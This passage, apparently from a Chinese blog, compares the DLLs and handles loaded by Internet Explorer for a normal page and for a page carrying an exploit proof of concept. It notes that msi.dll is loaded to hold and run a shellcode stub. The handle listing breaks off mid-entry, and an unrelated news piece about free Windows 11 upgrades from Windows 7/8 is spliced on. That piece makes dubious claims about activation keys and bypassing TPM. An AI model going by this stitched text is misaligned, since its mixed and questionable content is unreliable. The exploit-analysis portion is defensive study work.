ntdll.dll	NT 层 DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\ntdll.dll
ntdll.dll	NT 层 DLL	Microsoft Corporation	C:\\Windows\\System32\\ntdll.dll
ntmarta.dll	Windows NT MARTA provider	Microsoft Corporation	C:\\Windows\\SysWOW64\\ntmarta.dll
ole32.dll	Microsoft OLE for Windows	Microsoft Corporation	C:\\Windows\\SysWOW64\\ole32.dll
oleaut32.dll	OLEAUT32.DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\oleaut32.dll
OnDemandConnRouteHelper.dll	On Demand Connctiond Route Helper	Microsoft Corporation	C:\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll
OneCoreCommonProxyStub.dll	OneCore Common Proxy Stub	Microsoft Corporation	C:\\Windows\\SysWOW64\\OneCoreCommonProxyStub.dll
OneCoreUAPCommonProxyStub.dll	OneCoreUAP Common Proxy Stub	Microsoft Corporation	C:\\Windows\\SysWOW64\\OneCoreUAPCommonProxyStub.dll
powrprof.dll	Power Profile Helper DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\powrprof.dll
profapi.dll	User Profile Basic API	Microsoft Corporation	C:\\Windows\\SysWOW64\\profapi.dll
propsys.dll	Microsoft 属性系统	Microsoft Corporation	C:\\Windows\\SysWOW64\\propsys.dll
propsys.dll.mui	Microsoft 属性系统	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\propsys.dll.mui
R000000000006.clb			C:\\Windows\\Registration\\R000000000006.clb
rmclient.dll	Resource Manager Client	Microsoft Corporation	C:\\Windows\\SysWOW64\\rmclient.dll
rpcrt4.dll	远程过程调用运行时	Microsoft Corporation	C:\\Windows\\SysWOW64\\rpcrt4.dll
sechost.dll	Host for SCM/SDDL/LSA Lookup APIs	Microsoft Corporation	C:\\Windows\\SysWOW64\\sechost.dll
secur32.dll	Security Support Provider Interface	Microsoft Corporation	C:\\Windows\\SysWOW64\\secur32.dll
SHCore.dll	SHCORE	Microsoft Corporation	C:\\Windows\\SysWOW64\\SHCore.dll
shell32.dll	Windows Shell Common Dll	Microsoft Corporation	C:\\Windows\\SysWOW64\\shell32.dll
shlwapi.dll	外壳简易实用工具库	Microsoft Corporation	C:\\Windows\\SysWOW64\\shlwapi.dll
simsun.ttc			C:\\Windows\\Fonts\\simsun.ttc
SortDefault.nls			C:\\Windows\\Globalization\\Sorting\\SortDefault.nls
srpapi.dll	SRP APIs Dll	Microsoft Corporation	C:\\Windows\\SysWOW64\\srpapi.dll
sspicli.dll	Security Support Provider Interface	Microsoft Corporation	C:\\Windows\\SysWOW64\\sspicli.dll
StaticCache.dat			C:\\Windows\\Fonts\\StaticCache.dat
SuggestedSites.dat			C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat
TextInputFramework.dll	"TextInputFramework.DYNLINK"	Microsoft Corporation	C:\\Windows\\SysWOW64\\TextInputFramework.dll
tokenbinding.dll	Token Binding Protocol	Microsoft Corporation	C:\\Windows\\SysWOW64\\tokenbinding.dll
twinapi.appcore.dll	twinapi.appcore	Microsoft Corporation	C:\\Windows\\SysWOW64\\twinapi.appcore.dll
ucrtbase.dll	Microsoft® C Runtime Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\ucrtbase.dll
urlmon.dll	Win32 的 OLE32 扩展	Microsoft Corporation	C:\\Windows\\SysWOW64\\urlmon.dll
urlmon.dll.mui	Win32 的 OLE32 扩展	Microsoft Corporation	C:\\Windows\\System32\\zh-CN\\urlmon.dll.mui
user32.dll	多用户 Windows 用户 API 客户端 DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\user32.dll
uxtheme.dll	Microsoft UxTheme Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\uxtheme.dll
vaultcli.dll	Credential Vault Client Library	Microsoft Corporation	C:\\Windows\\SysWOW64\\vaultcli.dll
version.dll	Version Checking and File Installation Libraries	Microsoft Corporation	C:\\Windows\\SysWOW64\\version.dll
vm3dum_10.dll	VMware SVGA 3D D3D10 Client Driver	VMware, Inc.	C:\\Windows\\SysWOW64\\vm3dum_10.dll
vm3dum_loader.dll	VMware SVGA 3D Usermode Driver Loader	VMware, Inc.	C:\\Windows\\SysWOW64\\vm3dum_loader.dll
win32u.dll	Win32u	Microsoft Corporation	C:\\Windows\\SysWOW64\\win32u.dll
windows.storage.dll	Microsoft WinRT Storage API	Microsoft Corporation	C:\\Windows\\SysWOW64\\windows.storage.dll
winhttp.dll	Windows HTTP Services	Microsoft Corporation	C:\\Windows\\SysWOW64\\winhttp.dll
wininet.dll	Internet Extensions for Win32	Microsoft Corporation	C:\\Windows\\SysWOW64\\wininet.dll
winmm.dll	MCI API DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\winmm.dll
winmmbase.dll	Base Multimedia Extension API DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\winmmbase.dll
winnsi.dll	Network Store Information RPC interface	Microsoft Corporation	C:\\Windows\\SysWOW64\\winnsi.dll
wintrust.dll	Microsoft Trust Verification APIs	Microsoft Corporation	C:\\Windows\\SysWOW64\\wintrust.dll
WinTypes.dll	Windows Base Types DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\WinTypes.dll
wkscli.dll	Workstation Service Client DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\wkscli.dll
wldp.dll	Windows Lockdown Policy	Microsoft Corporation	C:\\Windows\\SysWOW64\\wldp.dll
wow64.dll	Win32 Emulation on NT64	Microsoft Corporation	C:\\Windows\\System32\\wow64.dll
wow64cpu.dll	AMD64 Wow64 CPU 	Microsoft Corporation	C:\\Windows\\System32\\wow64cpu.dll
wow64win.dll	Wow64 Console and Win32 API Logging	Microsoft Corporation	C:\\Windows\\System32\\wow64win.dll
ws2_32.dll	Windows Socket 2.0 32-Bit DLL	Microsoft Corporation	C:\\Windows\\SysWOW64\\ws2_32.dll

 

 

我们使用diff工具比较下差异:左边是hello world正常网页,右边是有上述漏洞页面的dll清单

 

 

好了,对比两份清单,只在漏洞页面进程里出现的有:msi.dll、scrrun.dll(两条)、sxs.dll、coml2.dll、netmsg.dll 及其 mui、KernelBase.dll.mui;正常页面则多了三个字体缓存文件和 simsun.ttc。其中 msi.dll 直接对应 POC 末尾的 LoadLibraryExA('msi.dll')(利用它的代码段存放并执行那段 6 字节的 shellcode 桩);scrrun.dll 是 Microsoft Script Runtime,也就是 Scripting.Dictionary 这类脚本运行时对象所在的模块。

明天分析下加载这几个dll的原因。

 

此外,还有handles的情况:

正常网页加载的如下:

Process: iexplore.exe Pid: 4808

Type	Name
ALPC Port	\\RPC Control\\OLE34456771BE500770E5370A356D34
ALPC Port	\\BaseNamedObjects\\[CoreUI]-PID(4808)-TID(1848) 47eceebc-de7c-4acb-b1fc-f85a5efe0698
Desktop	\\Default
Directory	\\KnownDlls
Directory	\\KnownDlls32
Directory	\\KnownDlls32
Directory	\\Sessions\\1\\BaseNamedObjects
Event	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_exhaustion_2230
Event	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_sm_e_2230_51402_7b
Event	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_sm_e_2230_51402_7c
Event	\\KernelObjects\\MaximumCommitCondition
File	C:\\Windows
File	C:\\Users\\bonelee\\Desktop
File	C:\\Program Files (x86)\\Internet Explorer\\zh-CN\\iexplore.exe.mui
File	\\Device\\CNG
File	\\Device\\DeviceApi
File	\\Device\\KsecDD
File	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51
File	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734
File	C:\\Windows\\Registration\\R000000000006.clb
File	\\Device\\Nsi
File	C:\\Windows\\SysWOW64\\zh-CN\\ieframe.dll.mui
File	C:\\Windows\\SysWOW64\\zh-CN\\propsys.dll.mui
File	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51
File	C:\\Windows\\SysWOW64\\zh-CN\\urlmon.dll.mui
File	C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat
File	C:\\Windows\\SysWOW64\\zh-CN\\mshtml.dll.mui
File	C:\\Windows\\Fonts\\simsun.ttc
File	C:\\Windows\\Fonts
File	C:\\Windows\\System32\\zh-CN\\mlang.dll.mui
File	C:\\Windows\\Fonts\\StaticCache.dat
File	C:\\Windows\\System32\\en-US\\imageres.dll.mui
Key	HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options
Key	HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Session Manager
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale
Key	HKLM
Key	HKLM
Key	HKLM\\SOFTWARE\\Microsoft\\Ole
Key	HKCU\\Software\\Classes\\Local Settings\\Software\\Microsoft
Key	HKCU\\Software\\Classes\\Local Settings
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main
Key	HKCU
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl
Key	HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids
Key	HKLM\\SOFTWARE\\Policies
Key	HKCU\\Software\\Policies
Key	HKCU\\Software
Key	HKLM\\SOFTWARE\\WOW6432Node
Key	HKCU\\Software\\Classes
Key	HKCU\\Software\\Microsoft\\Internet Explorer
Key	HKCU\\Software\\Classes
Key	HKLM\\SOFTWARE\\Microsoft\\WindowsRuntime
Key	HKLM\\SOFTWARE\\Microsoft\\WindowsRuntime\\ActivatableClassId
Key	HKCU\\Software\\Classes
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache
Key	HKU
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage
Key	HKLM\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\Protocol_Catalog9
Key	HKLM\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\NameSpace_Catalog5
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer
Key	HKCU\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
Key	HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\1AC14E77-02E7-4E5D-B744-2EB1AE5198B7\\PropertyBag
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\P3P\\History
Key	HKCU\\Software\\Classes
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts
Key	HKCU\\Software\\Classes\\MIME\\Database\\Content Type\\text/xml
Key	HKCU\\Software\\Microsoft\\Internet Explorer\\PhishingFilter
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
Key	HKCU\\EUDC
Key	HKCU\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\ProviderOrder
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder
Key	HKCU\\Software\\Microsoft\\FTP
Key	HKCU\\Software\\Microsoft\\Internet Explorer\\MINIE
Mutant	\\...\\!PrivacIE!SharedMem!Mutex
Mutant	\\Sessions\\1\\BaseNamedObjects\\SM0:4808:168:WilStaging_02
Mutant	\\Sessions\\1\\BaseNamedObjects\\IEHistJournalGlobal_3bf1c317-e96b-46f6-ba88-50c001d497aa
Mutant	\\Sessions\\1\\BaseNamedObjects\\VERMGMTBlockListFileMutex
Mutant	\\Sessions\\1\\BaseNamedObjects\\SmartScreen_AppRepSettings_Mutex
Mutant	\\Sessions\\1\\BaseNamedObjects\\SmartScreen_ClientId_Mutex
Mutant	\\Sessions\\1\\BaseNamedObjects\\CommunicationManager_Mutex
Mutant	\\Sessions\\1\\BaseNamedObjects\\ZonesCacheCounterMutex
Mutant	\\Sessions\\1\\BaseNamedObjects\\ZonesLockedCacheCounterMutex
Mutant	\\Sessions\\1\\BaseNamedObjects\\SM0:4808:64:WilError_02
Mutant	\\Sessions\\1\\BaseNamedObjects\\!BrowserEmulation!SharedMemory!Mutex
Mutant	\\Sessions\\1\\BaseNamedObjects\\IEHistJournalMx_1699bb90-bebe-4437-b6e8-a6b7123fa38e_7B0E6F39_C::USERS:BONELEE:APPDATA:LOCAL:MICROSOFT:WINDOWS:INETCACHE:LOW:SUGGESTEDSITES.DAT
Mutant	\\Sessions\\1\\BaseNamedObjects\\_!SHMSFTHISTORY!_
Section	\\Sessions\\1\\BaseNamedObjects\\ie_ias_00002230-0000-0000-0000-000000000000
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:7_9
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeUntrusted
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:1_8
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:0_7
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:2_a
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:2_c
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:3_3
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:3_4
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:3_5
Section	\\...\\!PrivacIE!SharedMem!Settings
Section	\\...\\!PrivacIE!SharedMem!Counter
Section	\\BaseNamedObjects\\__ComCatalogCache__
Section	\\Sessions\\1\\BaseNamedObjects\\windows_shell_global_counters
Section	\\Sessions\\1\\BaseNamedObjects\\windows_webcache_counters_9B6AB5B3-91BC-4097-835C-EA2DEC95E9CC_S-1-5-21-2730912745-1723166478-227975165-1000
Section	\\BaseNamedObjects\\__ComCatalogCache__
Section	\\Windows\\Theme570511858
Section	\\Sessions\\1\\Windows\\Theme2608543160
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IEFrame!GetAsyncKeyStateSharedMem
Section	\\Sessions\\1\\BaseNamedObjects\\VERMGMTSharedMemory
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeUntrusted_1:8_1
Section	\\Sessions\\1\\BaseNamedObjects\\UrlZonesSM_bonelee
Section	\\BaseNamedObjects\\F932B6C7-3A20-46A0-B8A0-8894AA421973
Section	\\Sessions\\1\\BaseNamedObjects\\12c8HWNDInterface:20d32
Section	\\Sessions\\1\\BaseNamedObjects\\12c8HWNDInterface:20d32
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:0_b
Section	\\Sessions\\1\\BaseNamedObjects\\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro
Section	\\Sessions\\1\\BaseNamedObjects\\C:*ProgramData*Microsoft*Windows*Caches*6AF0698E-D558-4F6E-9B3C-3716689AF493.2.ver0x0000000000000001.db
Section	\\Sessions\\1\\BaseNamedObjects\\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro
Section	\\Sessions\\1\\BaseNamedObjects\\C:*ProgramData*Microsoft*Windows*Caches*DDF571F2-BE98-426D-8288-1A9A39C3FDA2.2.ver0x0000000000000001.db
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:6_2
Section	\\Sessions\\1\\BaseNamedObjects\\windows_ie_global_counters
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:7_1
Section	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IsoSpaceV2_ScopeTrusted_0:7_6
Section	\\Sessions\\1\\BaseNamedObjects\\IEHistJournalFm_24c20119-753b-4f33-887d-f2381810562d_7B0E6F39_C::USERS:BONELEE:APPDATA:LOCAL:MICROSOFT:WINDOWS:INETCACHE:LOW:SUGGESTEDSITES.DAT
Section	\\BaseNamedObjects\\windows_shell_global_counters
Section	\\Sessions\\1\\BaseNamedObjects\\12c8HWNDInterface:40d38
Section	\\Sessions\\1\\BaseNamedObjects\\12c8HWNDInterface:40d38
Semaphore	\\Sessions\\1\\BaseNamedObjects\\SM0:4808:168:WilStaging_02_p0
Semaphore	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IEFrame!GetAsyncKeyStateQuery
Semaphore	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_IEFrame!GetAsyncKeyStateReply
Semaphore	\\Sessions\\1\\BaseNamedObjects\\SM0:4808:64:WilError_02_p0
Thread	iexplore.exe(4808): 4028
Thread	iexplore.exe(4808): 248
Thread	iexplore.exe(4808): 1848
Thread	iexplore.exe(4808): 248
Thread	iexplore.exe(4808): 1848
Thread	iexplore.exe(4808): 1848
Thread	iexplore.exe(4808): 1848
Thread	iexplore.exe(4808): 9988
Thread	iexplore.exe(4808): 2856
Thread	iexplore.exe(4808): 2856
Thread	iexplore.exe(4808): 8284
Thread	iexplore.exe(4808): 3976
Thread	iexplore.exe(4808): 1368
Thread	iexplore.exe(4808): 7892
Thread	iexplore.exe(4808): 6984
Thread	iexplore.exe(4808): 9676
Thread	iexplore.exe(4808): 1848
Thread	iexplore.exe(4808): 5496
Thread	iexplore.exe(4808): 1848
Thread	iexplore.exe(4808): 1848
Thread	iexplore.exe(4808): 1848
WindowStation	\\Sessions\\1\\Windows\\WindowStations\\WinSta0
WindowStation	\\Sessions\\1\\Windows\\WindowStations\\WinSta0

 加载有漏洞页面时的句柄情况:

Process: iexplore.exe Pid: 2280

Type	Name
ALPC Port	\\RPC Control\\OLECEAAAE2A0BE4602DC4230B1E60C4
ALPC Port	\\BaseNamedObjects\\[CoreUI]-PID(2280)-TID(3540) 368f8175-585c-4d74-8abb-bc017bcb0711
Desktop	\\Default
Directory	\\KnownDlls
Directory	\\KnownDlls32
Directory	\\KnownDlls32
Directory	\\Sessions\\1\\BaseNamedObjects
Event	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_exhaustion_2230
Event	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_sm_e_2230_31402_7b
Event	\\Sessions\\1\\BaseNamedObjects\\IsoScope_2230_iso_sm_e_2230_31402_7c
Event	\\KernelObjects\\MaximumCommitCondition
File	C:\\Windows
File	C:\\Users\\bonelee\\Desktop
File	\\Device\\CNG
File	C:\\Program Files (x86)\\Internet Explorer\\zh-CN\\iexplore.exe.mui
File	C:\\Users\\bonelee\\Desktop\\1809.html
File	\\Device\\DeviceApi
File	\\Device\\KsecDD
File	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51
File	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.17763.737_none_588eeadb78ace734
File	C:\\Windows\\Registration\\R000000000006.clb
File	\\Device\\Nsi
File	C:\\Windows\\SysWOW64\\zh-CN\\ieframe.dll.mui
File	C:\\Windows\\SysWOW64\\zh-CN\\propsys.dll.mui
File	C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51
File	C:\\Windows\\Fonts\\StaticCache.dat
File	C:\\Windows\\SysWOW64\\zh-CN\\urlmon.dll.mui
File	C:\\Windows\\SysWOW64\\zh-CN\\mshtml.dll.mui
File	C:\\Users\\bonelee\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Low\\SuggestedSites.dat
File	C:\\Windows\\System32\\zh-CN\\mlang.dll.mui
File	C:\\Windows\\SysWOW64\\scrrun.dll
File	C:\\Windows\\System32\\zh-CN\\KernelBase.dll.mui
File	C:\\Windows\\SysWOW64\\zh-CN\\netmsg.dll.mui
File	C:\\Windows\\System32\\en-US\\imageres.dll.mui
Key	HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options
Key	HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Session Manager
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Versions
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale
Key	HKLM
Key	HKLM
Key	HKLM\\SOFTWARE\\Microsoft\\Ole
Key	HKCU\\Software\\Classes\\Local Settings\\Software\\Microsoft
Key	HKCU\\Software\\Classes\\Local Settings
Key	HKCU
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main\\FeatureControl
Key	HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\Sorting\\Ids
Key	HKLM\\SOFTWARE\\WOW6432Node
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache
Key	HKLM\\SOFTWARE\\Policies
Key	HKCU\\Software\\Policies
Key	HKCU\\Software
Key	HKCU\\Software\\Microsoft\\Internet Explorer
Key	HKCU\\Software\\Classes
Key	HKCU\\Software\\Classes
Key	HKLM\\SOFTWARE\\Microsoft\\WindowsRuntime
Key	HKLM\\SOFTWARE\\Microsoft\\WindowsRuntime\\ActivatableClassId
Key	HKCU\\Software\\Classes
Key	HKU
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer
Key	HKLM\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage
Key	HKLM\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\NameSpace_Catalog5
Key	HKLM\\SYSTEM\\ControlSet001\\Services\\WinSock2\\Parameters\\Protocol_Catalog9
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\1AC14E77-02E7-4E5D-B744-2EB1AE5198B7\\PropertyBag
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\P3P\\History
Key	HKCU\\Software\\Classes
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts
Key	HKCU\\Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
Key	HKCU\\Software\\Classes\\MIME\\Database\\Content Type\\text/xml
Key	HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Extension Validation
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
Key	HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
Key	HKCU\\Software\\Microsoft\\Internet Explorer\\Main
Key	HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Internet Explorer\\Main
Key	HKCU\\Software\\Microsoft\\Internet Explorer\\BrowserEmulation
Key	

不止 Windows 10!Windows 7/8 也能免费升级到 Windows 11

起初,微软宣布为 Windows 7、Windows 8 和 Windows 8.1 用户提供的 Windows 10 免费升级于 2016 年结束。

Windows 11 免费升级

近日,微软表示将继续支持 Windows 7、Windows 8 和 Windows 8.1 用户免费升级到 Windows 10 或 Windows 11,只要他们满足最低系统要求。

Windows 11 的早期预览版已经包含 Windows 7、Windows 8 和 Windows 8.1 的配置密钥,允许用户免费升级。

对于使用受支持硬件的 Windows 10 用户,在 Windows 11 正式版发布后可以通过以下路径免费升级到 Windows 11:

  • Windows 更新

  • 媒体创建工具

  • Windows 更新助手(易升)

  • Windows Server Update Services(WSUS)

如果您的电脑不满足最低要求,可以绕过 TPM 2.0 要求,升级硬件或尝试使用 PE 安装。

Windows 10 将继续支持

当然,如果您不喜欢全新的 Windows 11 操作系统,您可以随时返回到 Windows 10 操作系统。微软承诺将对 Windows 10 的支持延续到 2025 年 10 月 14 日。

在 2025 年 10 月 14 日之前,微软将继续支持至少一个 Windows 10 家庭版、专业版、专业教育版、专业工作站版的半年频道,但不包括 Windows Insider 预览体验成员版和 Windows 10 企业版 LTSC。

Windows 11 应用程序兼容性

Windows 11 和 Windows 7 操作系统有很大的不同,但微软承诺你现有的应用程序将继续工作。

微软表示 Windows 11 的构建考虑到了兼容性。因此,如果您现有的应用程序在 Windows 7、Windows 8、Windows 8.1 和 Windows 10 上运行,它们将继续在 Windows 11 中得到支持。

Windows 11 正式版何时推出

微软计划在今年下半年推出 Windows 11 正式版,这意味着一旦可用,您可以手动更新到全新的 Windows 11。

但对于大多数目前在用 Windows 10 的电脑,微软计划于 2022 年初推出免费升级。

